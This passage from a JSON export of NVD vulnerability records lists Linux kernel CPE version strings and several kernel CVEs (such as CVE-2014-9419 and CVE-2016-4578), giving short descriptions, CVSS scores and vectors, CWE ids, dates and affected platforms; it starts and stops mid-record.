"cpe:2.3:o:linux:linux_kernel:3.11.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.42:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.66:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.48:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.58:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.51:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.56:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.59:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.65:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.32:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.12.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.67:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.31:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.44:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.37:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.53:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.12.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.46:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.12.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.50:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.54:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.35:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.47:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.64:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.12.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.34:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.31:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.33:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.55:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-28T10:24:20", "description": "The __switch_to function in arch/x86/kernel/process_64.c in the Linux kernel through 3.18.1 does not ensure that Thread Local Storage (TLS) descriptors are loaded before proceeding with other steps, which makes it easier for local users to bypass the ASLR protection mechanism via a crafted application that reads a TLS base address.", "cvss3": {}, "published": "2014-12-26T00:59:00", "type": "cve", "title": "CVE-2014-9419", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9419"], "modified": "2018-01-05T02:29:00", "cpe": ["cpe:/o:linux:linux_kernel:3.18.1"], "id": "CVE-2014-9419", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9419", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.18.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-28T02:25:11", "description": "The sco_sock_bind function in net/bluetooth/sco.c in the Linux kernel before 4.3.4 does not verify an address length, which allows local users to obtain sensitive information from kernel memory and bypass the KASLR protection mechanism via a crafted application.", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 4.0, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2016-02-08T03:59:00", "type": "cve", "title": "CVE-2015-8575", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8575"], "modified": "2017-11-04T01:29:00", "cpe": ["cpe:/o:linux:linux_kernel:4.3.3"], "id": "CVE-2015-8575", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8575", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.3.3:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:24:44", "description": "Race condition in the snd_pcm_period_elapsed function in sound/core/pcm_lib.c in the ALSA subsystem in the Linux kernel before 4.7 allows local users to cause a denial of service (use-after-free) or possibly have unspecified other impact via a crafted SNDRV_PCM_TRIGGER_START command.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-12-28T07:59:00", "type": "cve", "title": "CVE-2016-9794", "cwe": ["CWE-362", "CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9794"], "modified": "2023-01-17T21:05:00", "cpe": [], "id": "CVE-2016-9794", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9794", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-05-27T14:14:10", "description": "The tipc_nl_compat_link_dump function in net/tipc/netlink_compat.c in the Linux kernel through 4.6.3 does not properly copy a certain string, which allows local users to obtain sensitive information from kernel stack memory by reading a Netlink message.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-06-27T10:59:00", "type": "cve", "title": "CVE-2016-5243", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5243"], "modified": "2016-11-28T20:23:00", "cpe": ["cpe:/o:linux:linux_kernel:4.6.3"], "id": "CVE-2016-5243", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5243", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.6.3:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-28T10:13:56", "description": "The snd_ctl_elem_add function in sound/core/control.c in the ALSA control implementation in the Linux kernel before 3.15.2 does not properly maintain the user_ctl_count value, which allows local users to cause a denial of service (integer overflow and limit bypass) by leveraging /dev/snd/controlCX access for a large number of SNDRV_CTL_IOCTL_ELEM_REPLACE ioctl calls.", "cvss3": {}, "published": "2014-07-03T04:22:00", "type": "cve", "title": "CVE-2014-4655", "cwe": ["CWE-190"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4655"], "modified": "2020-08-14T18:02:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:suse:linux_enterprise_server:10"], "id": "CVE-2014-4655", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4655", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:esm:*:*:*", "cpe:2.3:o:suse:linux_enterprise_server:10:sp4:*:*:ltss:*:*:*"]}, {"lastseen": "2023-05-27T14:12:29", "description": "sound/core/timer.c in the Linux kernel through 4.6 does not initialize certain r1 data structures, which allows local users to obtain sensitive information from kernel stack memory via crafted use of the ALSA timer interface, related to the (1) snd_timer_user_ccallback and (2) snd_timer_user_tinterrupt functions.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-05-23T10:59:00", "type": "cve", "title": "CVE-2016-4578", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4578"], "modified": "2019-03-25T18:58:00", "cpe": ["cpe:/o:redhat:enterprise_linux_server_aus:7.6", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:15.10", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.5", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:opensuse:opensuse:13.1", "cpe:/o:redhat:enterprise_linux_server_eus:7.6", "cpe:/o:redhat:enterprise_linux_server_tus:7.3", "cpe:/o:opensuse:leap:42.1", "cpe:/o:redhat:enterprise_linux_server_eus:7.4", "cpe:/o:redhat:enterprise_linux_server_aus:7.4", "cpe:/o:redhat:enterprise_linux_server_aus:7.3", "cpe:/o:redhat:enterprise_linux_server_tus:7.6", "cpe:/o:linux:linux_kernel:4.6", "cpe:/o:redhat:enterprise_linux_server_eus:7.3"], "id": "CVE-2016-4578", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4578", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_server_eus:7.3:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.4:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.5:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:opensuse:leap:42.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.10:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.4:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.3:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.3:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-28T02:07:30", "description": "Race condition in the handle_to_path function in fs/fhandle.c in the Linux kernel through 3.19.1 allows local users to bypass intended size restrictions and trigger read operations on additional memory locations by changing the handle_bytes value of a file handle during the execution of this function.", "cvss3": {}, "published": "2015-03-16T10:59:00", "type": "cve", "title": "CVE-2015-1420", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1420"], "modified": "2016-12-28T02:59:00", "cpe": ["cpe:/o:debian:debian_linux:7.0", "cpe:/o:linux:linux_kernel:3.18.9"], "id": "CVE-2015-1420", "href": 